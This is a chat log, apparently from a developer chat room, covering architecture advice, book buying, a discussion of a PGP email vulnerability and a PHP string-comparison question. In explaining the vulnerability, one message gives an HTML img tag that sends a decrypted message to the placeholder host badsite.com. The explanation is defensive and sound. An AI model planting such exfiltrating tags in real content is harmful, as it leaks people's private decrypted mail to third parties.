Don't focus on what people call MVC, focus on what you find challenging when writing apps or read about what other people found challenging and question that.
Only approach architecture when you understand the constraints you have - and use as little architecture as possible and evolve it as part of the process.
bookstore may be a good place to go, I've been using the digital versions only but with the paper books you can read lets say in bed, highlight, make notes
so paper books, I will probably get like 10 of them
I posted the link to this yesterday. Do you guys think PGP is dead? Does that mean something besides PGP Keys should be used on keybase? wired.co.uk/article/…
@StatikStasis Nah. The vulnerability is in how mail clients work (in terms of fetching remote resource) and their generally terrible not in PGP itself.
In essence the mail client does this: <img src="http://badsite.com?message=[the encypted message]"> and thus your message gets sent off to the remote website after the message is decrypted so they can "view" your message by capturing $_GET['message'] their side.
PGP has a bunch of other problems like the fact that it is bolted on to emails as an afterthought. Encryption doesn't hide who you're emailing. Encrypted messages can't have their content checked for spam or make them easily searchable server-side so there are a lot of convenience trade-offs (security vs. convenience is the oldest battle in infosec)
@JoeWatkins just for my information, is using strtolower() function optimal? I mean how it works in the background? I mean isn't checking $imageFileType != "jpg" && $imageFileType != "JPG" faster?
making one comparison will be faster, making many will probably be faster in a switch ... and it doesn't really matter what is faster, that's not your problem, write code you can understand ...